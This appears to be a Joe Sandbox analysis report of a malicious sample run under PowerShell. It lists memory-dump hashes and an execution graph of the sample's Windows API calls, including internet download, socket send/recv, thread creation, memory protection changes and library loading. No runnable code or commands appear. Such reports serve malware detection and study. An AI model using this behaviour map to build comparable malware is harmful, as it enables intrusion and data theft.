                            • Instruction Fuzzy Hash: D0117F31A2020A8FCB64DE65C4807AABBE5EF94360F248467D41897371E7B1DDA1CBA1
                            Memory Dump Source
                            • Source File: 00000007.00000002.364585538.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_1dd000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f208e486f5e6360ee870fa4a69e854d6e52e5c425ce0408e2cbf9ad79c87fb86
                            • Instruction ID: 42b5bf34f5d5c5b0d43a3ed443b050cd25ca1f66905267d9d213eb66a9c651c7
                            • Opcode Fuzzy Hash: f208e486f5e6360ee870fa4a69e854d6e52e5c425ce0408e2cbf9ad79c87fb86
                            • Instruction Fuzzy Hash: BB01DF31504340ABE7205A25ECC4B66BB98DBC1364F28C01AED480E382D3799945DAB1
                            Memory Dump Source
                            • Source File: 00000007.00000002.364585538.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_1dd000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7a5eb6f148f7a7c301ebfdf3ebe9f7c81f6249057645f93ae4aa81b663e81ef4
                            • Instruction ID: c119e6f3c9c854c2f7d9c8e614a68e956370316a6b26f976079c1ab82777b654
                            • Opcode Fuzzy Hash: 7a5eb6f148f7a7c301ebfdf3ebe9f7c81f6249057645f93ae4aa81b663e81ef4
                            • Instruction Fuzzy Hash: 6101716150D3C09FD7128B259C94B52BFB4DF53224F1981DBE9888F2A3D2699C48C772
                            Memory Dump Source
                            • Source File: 00000007.00000002.364606964.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_250000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9b3550dd6756801fd5870fb68686d41d447a630883958d89541fb423536955c8
                            • Instruction ID: 0dbdfe8fb6640b6d024e02ebfd833e1ff853a945722cbfd2ecccd32dfc4facbc
                            • Opcode Fuzzy Hash: 9b3550dd6756801fd5870fb68686d41d447a630883958d89541fb423536955c8
                            • Instruction Fuzzy Hash: 94510FB0D106588FDB10DFA9C895B9EFBF5EF49304F20812AE814AB250D7749949CF49
                            Memory Dump Source
                            • Source File: 00000007.00000002.364606964.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_250000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ef5a354d3cc03b96f3d1cbf87515d6346347bd5cff0ffa315cf204e3b772eb30
                            • Instruction ID: f7787453a2fe021d5f44c2db82b8be90d341d6d9b8237b1a77ba9d3b5fe00fbf
                            • Opcode Fuzzy Hash: ef5a354d3cc03b96f3d1cbf87515d6346347bd5cff0ffa315cf204e3b772eb30
                            • Instruction Fuzzy Hash: 6441EBB0D106588FDB10DFA9C995B9EFBF5AF49304F20902AE824AB250D774A949CF49
                            Memory Dump Source
                            • Source File: 00000007.00000002.364606964.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_250000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2609a5eeee126731b381993f8504f851782342bac77143d9f4da76720a296891
                            • Instruction ID: 5e678109feb3a7c7989d769647d6bb7285f7a264e3f933e5cf0d67b160a3c831
                            • Opcode Fuzzy Hash: 2609a5eeee126731b381993f8504f851782342bac77143d9f4da76720a296891
                            • Instruction Fuzzy Hash: AE31951140E3C06FDB07A77948B00A67FB0AE9321530F64E3C4D0CF5A3E609892ED36A
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.364632736.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: (:($(:($(:($L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$L:($L:($L:(
                            • API String ID: 0-196646589
                            • Opcode ID: 273c5cb95f0cdd2a5795dd4c520c646f3a4ba52f5cafbba483600fcd2da148fd
                            • Instruction ID: 000c6de1e9ef6ba9f24ea2f946bc1809890501f8ba929c5b96b69f2803988bba
                            • Opcode Fuzzy Hash: 273c5cb95f0cdd2a5795dd4c520c646f3a4ba52f5cafbba483600fcd2da148fd
                            • Instruction Fuzzy Hash: E6D12531B10249AFDF159E64D884BBE77A2AFC0310F14806BE9159B3A2CBB0DD55CB62
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.364632736.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: (:($(:($L4#p$L4#p$L4#p
                            • API String ID: 0-1960093006
                            • Opcode ID: 14ee3c2b359d68aacd54a1ebf3459b7bcdc81687d3fd5c8a0b85b129f75052a2
                            • Instruction ID: 633cb868b334aff7fa12a4bb4c8badc6e9c0e0a2aa342efe838a7a02ff20ef60
                            • Opcode Fuzzy Hash: 14ee3c2b359d68aacd54a1ebf3459b7bcdc81687d3fd5c8a0b85b129f75052a2
                            • Instruction Fuzzy Hash: B1513731A19385AFDB128F24C8947A97FB1AF82300F1981A7E8449B3F2C7B4DD55CB52
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.364632736.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2d0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: (:($(:($L4#p$L4#p$L4#p
                            • API String ID: 0-1960093006
                            • Opcode ID: 22019d45406a0a8b2e5af08886954c8f87ccf81838a815b9df946e143b3a19e4
                            • Instruction ID: 6894c92c82c4b9772a55ef143fdb9c3f4d41f95589d02b15674bfdf409e94eb8
                            • Opcode Fuzzy Hash: 22019d45406a0a8b2e5af08886954c8f87ccf81838a815b9df946e143b3a19e4
                            • Instruction Fuzzy Hash: 0541E331624249AFDF158F14C8887BD7BA1AF81300F5980A7E8549B3F2C7B4DD95CB51

                            Execution Graph

                            Execution Coverage:5.7%
                            Dynamic/Decrypted Code Coverage:19.7%
                            Signature Coverage:4%
                            Total number of Nodes:1515
                            Total number of Limit Nodes:43
                            execution_graph 53042 415d41 53057 41b411 53042->53057 53044 415d4a 53068 4020f6 53044->53068 53049 4170c4 53092 401e8d 53049->53092 53053 401fd8 11 API calls 53054 4170d9 53053->53054 53055 401fd8 11 API calls 53054->53055 53056 4170e5 53055->53056 53098 4020df 53057->53098 53062 41b456 InternetReadFile 53067 41b479 53062->53067 53063 41b4a6 InternetCloseHandle InternetCloseHandle 53065 41b4b8 53063->53065 53065->53044 53066 401fd8 11 API calls 53066->53067 53067->53062 53067->53063 53067->53066 53109 4020b7 53067->53109 53069 40210c 53068->53069 53070 4023ce 11 API calls 53069->53070 53071 402126 53070->53071 53072 402569 28 API calls 53071->53072 53073 402134 53072->53073 53074 404aa1 53073->53074 53075 404ab4 53074->53075 53176 40520c 53075->53176 53077 404ac9 ctype 53078 404b40 WaitForSingleObject 53077->53078 53079 404b20 53077->53079 53081 404b56 53078->53081 53080 404b32 send 53079->53080 53082 404b7b 53080->53082 53182 4210cb 54 API calls 53081->53182 53085 401fd8 11 API calls 53082->53085 53084 404b69 SetEvent 53084->53082 53086 404b83 53085->53086 53087 401fd8 11 API calls 53086->53087 53088 404b8b 53087->53088 53088->53049 53089 401fd8 53088->53089 53090 4023ce 11 API calls 53089->53090 53091 401fe1 53090->53091 53091->53049 53093 402163 53092->53093 53097 40219f 53093->53097 53200 402730 11 API calls 53093->53200 53095 402184 53201 402712 11 API calls std::_Deallocate 53095->53201 53097->53053 53099 4020e7 53098->53099 53115 4023ce 53099->53115 53101 4020f2 53102 43bda0 53101->53102 53107 4461b8 __Getctype 53102->53107 53103 4461f6 53131 44062d 20 API calls _Atexit 53103->53131 53104 4461e1 RtlAllocateHeap 53106 41b42f InternetOpenW InternetOpenUrlW 53104->53106 53104->53107 53106->53062 53107->53103 53107->53104 53130 443001 7 API calls 2 library calls 53107->53130 53110 4020bf 53109->53110 53111 4023ce 11 API calls 53110->53111 53112 4020ca 53111->53112 53132 40250a 53112->53132 53114 4020d9 53114->53067 53116 402428 53115->53116 53117 4023d8 53115->53117 53116->53101 53117->53116 53119 4027a7 53117->53119 53120 402e21 53119->53120 53123 4016b4 53120->53123 53122 402e30 53122->53116 53125 4016c6 53123->53125 53126 4016cb 53123->53126 53124 4016f3 53124->53122 53129 43bd68 11 API calls _Atexit 53125->53129 53126->53124 53126->53125 53128 43bd67 53129->53128 53130->53107 53131->53106 53133 40251a 53132->53133 53134 402520 53133->53134 53135 402535 53133->53135 53139 402569 53134->53139 53149 4028e8 53135->53149 53138 402533 53138->53114 53160 402888 53139->53160 53141 40257d 53142 402592 53141->53142 53143 4025a7 53141->53143 53165 402a34 22 API calls 53142->53165 53145 4028e8 28 API calls 53143->53145 53148 4025a5 53145->53148 53146 40259b 53166 4029da 22 API calls 53146->53166 53148->53138 53150 4028f1 53149->53150 53151 402953 53150->53151 53152 4028fb 53150->53152 53174 4028a4 22 API calls 53151->53174 53155 402904 53152->53155 53158 402917 53152->53158 53168 402cae 53155->53168 53156 402915 53156->53138 53158->53156 53159 4023ce 11 API calls 53158->53159 53159->53156 53161 402890 53160->53161 53162 402898 53161->53162 53167 402ca3 22 API calls 53161->53167 53162->53141 53165->53146 53166->53148 53169 402cb8 __EH_prolog 53168->53169 53175 402e54 22 API calls 53169->53175 53171 402d24 53172 4023ce 11 API calls 53171->53172 53173 402d92 53172->53173 53173->53156 53175->53171 53177 405214 53176->53177 53178 4023ce 11 API calls 53177->53178 53179 40521f 53178->53179 53183 405234 53179->53183 53181 40522e 53181->53077 53182->53084 53184 405240 53183->53184 53185 40526e 53183->53185 53187 4028e8 28 API calls 53184->53187 53199 4028a4 22 API calls 53185->53199 53189 40524a 53187->53189 53189->53181 53200->53095 53201->53097 53202 10006d60 53203 10006d69 53202->53203 53204 10006d72 53202->53204 53206 10006c5f 53203->53206 53226 10005af6 GetLastError 53206->53226 53208 10006c6c 53246 10006d7e 53208->53246 53210 10006c74 53255 100069f3 53210->53255 53213 10006c8b 53213->53204 53216 10006cce 53280 1000571e 19 API calls _free 53216->53280 53220 10006cc9 53279 10006368 19 API calls _free 53220->53279 53222 10006d12 53222->53216 53282 100068c9 25 API calls 53222->53282 53223 10006ce6 53223->53222 53281 1000571e 19 API calls _free 53223->53281 53227 10005b12 53226->53227 53228 10005b0c 53226->53228 53232 10005b61 SetLastError 53227->53232 53284 1000637b 19 API calls 2 library calls 53227->53284 53283 10005e08 10 API calls 2 library calls 53228->53283 53231 10005b24 53233 10005b2c 53231->53233 53286 10005e5e 10 API calls 2 library calls 53231->53286 53232->53208 53285 1000571e 19 API calls _free 53233->53285 53236 10005b41 53236->53233 53238 10005b48 53236->53238 53237 10005b32 53240 10005b6d SetLastError 53237->53240 53287 1000593c 19 API calls _abort 53238->53287 53289 100055a8 36 API calls _abort 53240->53289 53241 10005b53 53288 1000571e 19 API calls _free 53241->53288 53245 10005b5a 53245->53232 53245->53240 53247 10006d8a ___DestructExceptionObject 53246->53247 53248 10005af6 _abort 36 API calls 53247->53248 53253 10006d94 53248->53253 53250 10006e18 _abort 53250->53210 53253->53250 53290 100055a8 36 API calls _abort 53253->53290 53291 10005671 RtlEnterCriticalSection 53253->53291 53292 1000571e 19 API calls _free 53253->53292 53293 10006e0f RtlLeaveCriticalSection _abort 53253->53293 53294 100054a7 53255->53294 53258 10006a14 GetOEMCP 53260 10006a3d 53258->53260 53259 10006a26 53259->53260 53261 10006a2b GetACP 53259->53261 53260->53213 53262 100056d0 53260->53262 53261->53260 53263 1000570e 53262->53263 53268 100056de _abort 53262->53268 53305 10006368 19 API calls _free 53263->53305 53264 100056f9 RtlAllocateHeap 53266 1000570c 53264->53266 53264->53268 53266->53216 53269 10006e20 53266->53269 53268->53263 53268->53264 53304 1000474f 7 API calls 2 library calls 53268->53304 53270 100069f3 38 API calls 53269->53270 53271 10006e3f 53270->53271 53274 10006e90 IsValidCodePage 53271->53274 53276 10006e46 53271->53276 53278 10006eb5 ___scrt_fastfail 53271->53278 53273 10006cc1 53273->53220 53273->53223 53275 10006ea2 GetCPInfo 53274->53275 53274->53276 53275->53276 53275->53278 53316 10002ada 53276->53316 53306 10006acb GetCPInfo 53278->53306 53279->53216 53280->53213 53281->53222 53282->53216 53283->53227 53284->53231 53285->53237 53286->53236 53287->53241 53288->53245 53291->53253 53292->53253 53293->53253 53295 100054c4 53294->53295 53301 100054ba 53294->53301 53296 10005af6 _abort 36 API calls 53295->53296 53295->53301 53297 100054e5 53296->53297 53302 10007a00 36 API calls __fassign 53297->53302 53299 100054fe 53303 10007a2d 36 API calls __fassign 53299->53303 53301->53258 53301->53259 53302->53299 53303->53301 53304->53268 53305->53266 53307 10006b05 53306->53307 53315 10006baf 53306->53315 53323 100086e4 53307->53323 53310 10002ada _ValidateLocalCookies 5 API calls 53312 10006c5b 53310->53312 53312->53276 53314 10008a3e 41 API calls 53314->53315 53315->53310 53317 10002ae3 53316->53317 53318 10002ae5 IsProcessorFeaturePresent 53316->53318 53317->53273 53320 10002b58 53318->53320 53393 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53320->53393 53322 10002c3b 53322->53273 53324 100054a7 __fassign 36 API calls 53323->53324 53325 10008704 MultiByteToWideChar 53324->53325 53327 10008742 53325->53327 53335 100087da 53325->53335 53328 10008763 ___scrt_fastfail 53327->53328 53330 100056d0 20 API calls 53327->53330 53332 100087d4 53328->53332 53334 100087a8 MultiByteToWideChar 53328->53334 53329 10002ada _ValidateLocalCookies 5 API calls 53331 10006b66 53329->53331 53330->53328 53337 10008a3e 53331->53337 53342 10008801 19 API calls _free 53332->53342 53334->53332 53336 100087c4 GetStringTypeW 53334->53336 53335->53329 53336->53332 53338 100054a7 __fassign 36 API calls 53337->53338 53339 10008a51 53338->53339 53343 10008821 53339->53343 53342->53335 53344 1000883c 53343->53344 53345 10008862 MultiByteToWideChar 53344->53345 53346 10008a16 53345->53346 53347 1000888c 53345->53347 53348 10002ada _ValidateLocalCookies 5 API calls 53346->53348 53350 100056d0 20 API calls 53347->53350 53353 100088ad 53347->53353 53349 10006b87 53348->53349 53349->53314 53350->53353 53351 100088f6 MultiByteToWideChar 53352 10008962 53351->53352 53354 1000890f 53351->53354 53379 10008801 19 API calls _free 53352->53379 53353->53351 53353->53352 53370 10005f19 53354->53370 53358 10008971 53362 100056d0 20 API calls 53358->53362 53365 10008992 53358->53365 53359 10008939 53359->53352 53361 10005f19 10 API calls 53359->53361 53360 10008a07 53378 10008801 19 API calls _free 53360->53378 53361->53352 53362->53365 53363 10005f19 10 API calls 53366 100089e6 53363->53366 53365->53360 53365->53363 53366->53360 53367 100089f5 WideCharToMultiByte 53366->53367 53367->53360 53368 10008a35 53367->53368 53380 10008801 19 API calls _free 53368->53380 53381 10005c45 53370->53381 53372 10005f40 53373 10005f49 53372->53373 53385 10005fa1 9 API calls 2 library calls 53372->53385 53376 10002ada _ValidateLocalCookies 5 API calls 53373->53376 53375 10005f89 LCMapStringW 53375->53373 53377 10005f9b 53376->53377 53377->53352 53377->53358 53377->53359 53378->53352 53379->53346 53380->53352 53382 10005c71 53381->53382 53384 10005c75 __crt_fast_encode_pointer 53381->53384 53382->53384 53386 10005ce1 53382->53386 53384->53372 53385->53375 53387 10005d02 LoadLibraryExW 53386->53387 53388 10005cf7 53386->53388 53389 10005d37 53387->53389 53390 10005d1f GetLastError 53387->53390 53388->53382 53389->53388 53392 10005d4e FreeLibrary 53389->53392 53390->53389 53391 10005d2a LoadLibraryExW 53390->53391 53391->53389 53392->53388 53393->53322 53394 434906 53399 434bd8 SetUnhandledExceptionFilter 53394->53399 53396 43490b pre_c_initialization 53400 4455cc 20 API calls 2 library calls 53396->53400 53398 434916 53399->53396 53400->53398 53401 1000c7a7 53402 1000c7be 53401->53402 53409 1000c82c 53401->53409 53402->53409 53411 1000c7e6 GetModuleHandleA 53402->53411 53403 1000c872 53404 1000c835 GetModuleHandleA 53406 1000c83f 53404->53406 53406->53406 53406->53409 53409->53403 53409->53404 53412 1000c7ef 53411->53412 53418 1000c82c 53411->53418 53421 1000c803 53412->53421 53414 1000c872 53415 1000c835 GetModuleHandleA 53416 1000c83f 53415->53416 53416->53416 53416->53418 53418->53414 53418->53415 53422 1000c809 53421->53422 53423 1000c82c 53422->53423 53424 1000c80d VirtualProtect 53422->53424 53426 1000c835 GetModuleHandleA 53423->53426 53427 1000c872 53423->53427 53424->53423 53425 1000c81c VirtualProtect 53424->53425 53425->53423 53428 1000c83f 53426->53428 53428->53423 53429 43bea8 53432 43beb4 _swprintf ___DestructExceptionObject 53429->53432 53430 43bec2 53445 44062d 20 API calls _Atexit 53430->53445 53432->53430 53433 43beec 53432->53433 53440 445909 EnterCriticalSection 53433->53440 53435 43bef7 53441 43bf98 53435->53441 53436 43bec7 ___DestructExceptionObject __cftof 53440->53435 53442 43bfa6 53441->53442 53442->53442 53444 43bf02 53442->53444 53447 4497ec 37 API calls 2 library calls 53442->53447 53446 43bf1f LeaveCriticalSection std::_Lockit::~_Lockit 53444->53446 53445->53436 53446->53436 53447->53442 53448 4458c8 53450 4458d3 53448->53450 53451 4458fc 53450->53451 53452 4458f8 53450->53452 53454 448b04 53450->53454 53461 445920 DeleteCriticalSection 53451->53461 53462 44854a 53454->53462 53457 448b49 InitializeCriticalSectionAndSpinCount 53458 448b34 53457->53458 53469 43502b 53458->53469 53460 448b60 53460->53450 53461->53452 53463 448576 53462->53463 53464 44857a 53462->53464 53463->53464 53466 44859a 53463->53466 53476 4485e6 53463->53476 53464->53457 53464->53458 53466->53464 53467 4485a6 GetProcAddress 53466->53467 53468 4485b6 __crt_fast_encode_pointer 53467->53468 53468->53464 53470 435036 IsProcessorFeaturePresent 53469->53470 53471 435034 53469->53471 53473 435078 53470->53473 53471->53460 53483 43503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53473->53483 53475 43515b 53475->53460 53477 448607 LoadLibraryExW 53476->53477 53481 4485fc 53476->53481 53478 448624 GetLastError 53477->53478 53479 44863c 53477->53479 53478->53479 53482 44862f LoadLibraryExW 53478->53482 53480 448653 FreeLibrary 53479->53480 53479->53481 53480->53481 53481->53463 53482->53479 53483->53475 53484 41e04e 53485 41e063 ctype ___scrt_fastfail 53484->53485 53486 41e266 53485->53486 53503 432f55 21 API calls _Yarn 53485->53503 53492 41e21a 53486->53492 53498 41dbf3 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 53486->53498 53489 41e277 53489->53492 53499 432f55 21 API calls _Yarn 53489->53499 53491 41e213 ___scrt_fastfail 53491->53492 53504 432f55 21 API calls _Yarn 53491->53504 53494 41e2b0 ___scrt_fastfail 53494->53492 53500 4335db 53494->53500 53496 41e240 ___scrt_fastfail 53496->53492 53505 432f55 21 API calls _Yarn 53496->53505 53498->53489 53499->53494 53506 4334fa 53500->53506 53502 4335e3 53502->53492 53503->53491 53504->53496 53505->53486 53507 433513 53506->53507 53511 433509 53506->53511 53507->53511 53512 432f55 21 API calls _Yarn 53507->53512 53509 433534 53509->53511 53513 4338c8 CryptAcquireContextA 53509->53513 53511->53502 53512->53509 53514 4338e9 CryptGenRandom 53513->53514 53515 4338e4 53513->53515 53514->53515 53516 4338fe CryptReleaseContext 53514->53516 53515->53511 53516->53515 53517 426c6d 53523 426d42 recv 53517->53523 53524 426a77 53525 426a8c 53524->53525 53532 426b1e 53524->53532 53526 426b83 53525->53526 53527 426b0e 53525->53527 53528 426bae 53525->53528 53525->53532 53534 426b4e 53525->53534 53536 426ad9 53525->53536 53538 426bd5 53525->53538 53552 424f6e 49 API calls ctype 53525->53552 53526->53528 53556 425781 21 API calls 53526->53556 53527->53532 53527->53534 53554 424f6e 49 API calls ctype 53527->53554 53528->53532 53528->53538 53540 425b72 53528->53540 53534->53526 53534->53532 53555 41fbfd 52 API calls 53534->53555 53536->53527 53536->53532 53553 41fbfd 52 API calls 53536->53553 53538->53532 53557 4261e6 28 API calls 53538->53557 53541 425b91 ___scrt_fastfail 53540->53541 53543 425ba0 53541->53543 53547 425bc5 53541->53547 53558 41ec4c 21 API calls 53541->53558 53543->53547 53551 425ba5 53543->53551 53559 420669 46 API calls 53543->53559 53546 425bae 53546->53547 53562 424d96 21 API calls 2 library calls 53546->53562 53547->53538 53549 425c48 53549->53547 53560 432f55 21 API calls _Yarn 53549->53560 53551->53546 53551->53547 53561 41daf0 49 API calls 53551->53561 53552->53536 53553->53536 53554->53534 53555->53534 53556->53528 53557->53532 53558->53543 53559->53549 53560->53551 53561->53546 53562->53547 53563 4165db 53574 401e65 53563->53574 53565 4165eb 53566 4020f6 28 API calls 53565->53566 53567 4165f6 53566->53567 53568 401e65 22 API calls 53567->53568 53569 416601 53568->53569 53570 4020f6 28 API calls 53569->53570 53571 41660c 53570->53571 53579 412965 53571->53579 53575 401e6d 53574->53575 53576 401e75 53575->53576 53598 402158 22 API calls 53575->53598 53576->53565 53599 40482d 53579->53599 53581 412979 53606 4048c8 connect 53581->53606 53585 41299a 53671 402f10 53585->53671 53588 404aa1 61 API calls 53589 4129ae 53588->53589 53590 401fd8 11 API calls 53589->53590 53591 4129b6 53590->53591 53676 404c10 53591->53676 53594 401fd8 11 API calls 53595 4129cc 53594->53595 53596 401fd8 11 API calls 53595->53596 53597 4129d4 53596->53597 53600 404846 socket 53599->53600 53601 404839 53599->53601 53603 404860 CreateEventW 53600->53603 53604 404842 53600->53604 53694 40489e WSAStartup 53601->53694 53603->53581 53604->53581 53605 40483e 53605->53600 53605->53604 53607 404a1b 53606->53607 53608 4048ee 53606->53608 53609 40497e 53607->53609 53610 404a21 WSAGetLastError 53607->53610 53608->53609 53611 404923 53608->53611 53695 40531e 53608->53695 53666 402f31 53609->53666 53610->53609 53612 404a31 53610->53612 53730 420cf1 27 API calls 53611->53730 53614 404932 53612->53614 53615 404a36 53612->53615 53620 402093 28 API calls 53614->53620 53735 41cb72 30 API calls 53615->53735 53617 40490f 53700 402093 53617->53700 53619 40492b 53619->53614 53623 404941 53619->53623 53624 404a80 53620->53624 53622 404a40 53736 4052fd 28 API calls 53622->53736 53632 404950 53623->53632 53633 404987 53623->53633 53627 402093 28 API calls 53624->53627 53630 404a8f 53627->53630 53635 41b580 80 API calls 53630->53635 53634 402093 28 API calls 53632->53634 53732 421ad1 54 API calls 53633->53732 53638 40495f 53634->53638 53635->53609 53641 402093 28 API calls 53638->53641 53640 40498f 53643 4049c4 53640->53643 53644 404994 53640->53644 53645 40496e 53641->53645 53734 420e97 28 API calls 53643->53734 53648 402093 28 API calls 53644->53648 53649 41b580 80 API calls 53645->53649 53651 4049a3 53648->53651 53652 404973 53649->53652 53650 4049cc 53653 4049f9 CreateEventW CreateEventW 53650->53653 53656 402093 28 API calls 53650->53656 53654 402093 28 API calls 53651->53654 53731 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53652->53731 53653->53609 53655 4049b2 53654->53655 53657 41b580 80 API calls 53655->53657 53659 4049e2 53656->53659 53660 4049b7 53657->53660 53661 402093 28 API calls 53659->53661 53733 421143 52 API calls 53660->53733 53663 4049f1 53661->53663 53664 41b580 80 API calls 53663->53664 53665 4049f6 53664->53665 53665->53653 53667 4020df 11 API calls 53666->53667 53668 402f3d 53667->53668 53669 4032a0 28 API calls 53668->53669 53670 402f59 53669->53670 53670->53585 53787 401fb0 53671->53787 53673 402f1e 53674 402055 11 API calls 53673->53674 53675 402f2d 53674->53675 53675->53588 53677 4020df 11 API calls 53676->53677 53678 404c27 53677->53678 53679 4020df 11 API calls 53678->53679 53682 404c30 53679->53682 53680 43bda0 _Yarn 21 API calls 53680->53682 53682->53680 53683 4020b7 28 API calls 53682->53683 53684 404ca1 53682->53684 53688 401fd8 11 API calls 53682->53688 53790 404b96 53682->53790 53796 401fe2 53682->53796 53805 404cc3 53682->53805 53683->53682 53817 404e26 WaitForSingleObject 53684->53817 53688->53682 53689 401fd8 11 API calls 53690 404cb1 53689->53690 53691 401fd8 11 API calls 53690->53691 53692 404cba 53691->53692 53692->53594 53694->53605 53696 4020df 11 API calls 53695->53696 53697 40532a 53696->53697 53737 4032a0 53697->53737 53699 405346 53699->53617 53701 40209b 53700->53701 53702 4023ce 11 API calls 53701->53702 53703 4020a6 53702->53703 53741 4024ed 53703->53741 53706 41b580 53707 41b631 53706->53707 53708 41b596 GetLocalTime 53706->53708 53710 401fd8 11 API calls 53707->53710 53709 40531e 28 API calls 53708->53709 53711 41b5d8 53709->53711 53712 41b639 53710->53712 53745 406383 53711->53745 53714 401fd8 11 API calls 53712->53714 53716 41b641 53714->53716 53716->53611 53717 402f10 28 API calls 53718 41b5f0 53717->53718 53719 406383 28 API calls 53718->53719 53720 41b5fc 53719->53720 53750 40723b 77 API calls 53720->53750 53722 41b60a 53723 401fd8 11 API calls 53722->53723 53724 41b616 53723->53724 53725 401fd8 11 API calls 53724->53725 53726 41b61f 53725->53726 53727 401fd8 11 API calls 53726->53727 53728 41b628 53727->53728 53729 401fd8 11 API calls 53728->53729 53729->53707 53730->53619 53731->53609 53732->53640 53733->53652 53734->53650 53735->53622 53739 4032aa 53737->53739 53738 4032c9 53738->53699 53739->53738 53740 4028e8 28 API calls 53739->53740 53740->53738 53742 4024f9 53741->53742 53743 40250a 28 API calls 53742->53743 53744 4020b1 53743->53744 53744->53706 53751 4051ef 53745->53751 53747 406391 53755 402055 53747->53755 53750->53722 53752 4051fb 53751->53752 53761 405274 53752->53761 53754 405208 53754->53747 53756 402061 53755->53756 53757 4023ce 11 API calls 53756->53757 53758 40207b 53757->53758 53783 40267a 53758->53783 53762 405282 53761->53762 53763 405288 53762->53763 53764 40529e 53762->53764 53772 4025f0 53763->53772 53766 4052f5 53764->53766 53767 4052b6 53764->53767 53781 4028a4 22 API calls 53766->53781 53770 4028e8 28 API calls 53767->53770 53771 40529c 53767->53771 53770->53771 53771->53754 53773 402888 22 API calls 53772->53773 53774 402602 53773->53774 53775 402672 53774->53775 53776 402629 53774->53776 53782 4028a4 22 API calls 53775->53782 53778 4028e8 28 API calls 53776->53778 53780 40263b 53776->53780 53778->53780 53780->53771 53784 40268b 53783->53784 53785 4023ce 11 API calls 53784->53785 53786 40208d 53785->53786 53786->53717 53788 4025f0 28 API calls 53787->53788 53789 401fbd 53788->53789 53789->53673 53791 404ba0 WaitForSingleObject 53790->53791 53792 404bcd recv 53790->53792 53830 421107 54 API calls 53791->53830 53794 404be0 53792->53794 53794->53682 53795 404bbc SetEvent 53795->53794 53797 401ff1 53796->53797 53798 402039 53796->53798 53799 4023ce 11 API calls 53797->53799 53798->53682 53800 401ffa 53799->53800 53801 40203c 53800->53801 53803 402015 53800->53803 53802 40267a 11 API calls 53801->53802 53802->53798 53831 403098 28 API calls 53803->53831 53806 4020df 11 API calls 53805->53806 53807 404cde 53806->53807 53808 404e13 53807->53808 53811 4041a2 28 API calls 53807->53811 53812 401fe2 28 API calls 53807->53812 53813 401fd8 11 API calls 53807->53813 53814 4020f6 28 API calls 53807->53814 53832 401fc0 53807->53832 53809 401fd8 11 API calls 53808->53809 53810 404e1c 53809->53810 53810->53682 53811->53807 53812->53807 53813->53807 53814->53807 53818 404e40 SetEvent CloseHandle 53817->53818 53819 404e57 closesocket 53817->53819 53820 404ca8 53818->53820 53821 404e64 53819->53821 53820->53689 53822 404e7a 53821->53822 54158 4050e4 84 API calls 53821->54158 53824 404e8c WaitForSingleObject 53822->53824 53825 404ece SetEvent CloseHandle 53822->53825 54159 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53824->54159 53825->53820 53827 404e9b SetEvent WaitForSingleObject 54160 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53827->54160 53829 404eb3 SetEvent CloseHandle CloseHandle 53829->53825 53830->53795 53831->53798 53833 401fd2 CreateEventA CreateThread WaitForSingleObject CloseHandle 53832->53833 53834 401fc9 53832->53834 53833->53807 53837 415b25 53833->53837 53836 4025e0 28 API calls 53834->53836 53836->53833 53838 4020f6 28 API calls 53837->53838 53839 415b47 SetEvent 53838->53839 53840 415b5c 53839->53840 53916 4041a2 53840->53916 53843 4020f6 28 API calls 53844 415b86 53843->53844 53845 4020f6 28 API calls 53844->53845 53846 415b98 53845->53846 53919 41beac 53846->53919 53849 415bc1 GetTickCount 53941 41bc1f 53849->53941 53850 415d20 53914 415d11 53850->53914 53915 415d34 53850->53915 53851 401e8d 11 API calls 53853 4170cd 53851->53853 53856 401fd8 11 API calls 53853->53856 53858 4170d9 53856->53858 53860 401fd8 11 API calls 53858->53860 53859 415bde 53862 41bc1f 28 API calls 53859->53862 53861 4170e5 53860->53861 53863 415be9 53862->53863 53947 41bb27 53863->53947 53868 401e65 22 API calls 53869 415c13 53868->53869 53870 402f31 28 API calls 53869->53870 53871 415c21 53870->53871 53956 402ea1 28 API calls 53871->53956 53873 415c30 53874 402f10 28 API calls 53873->53874 53875 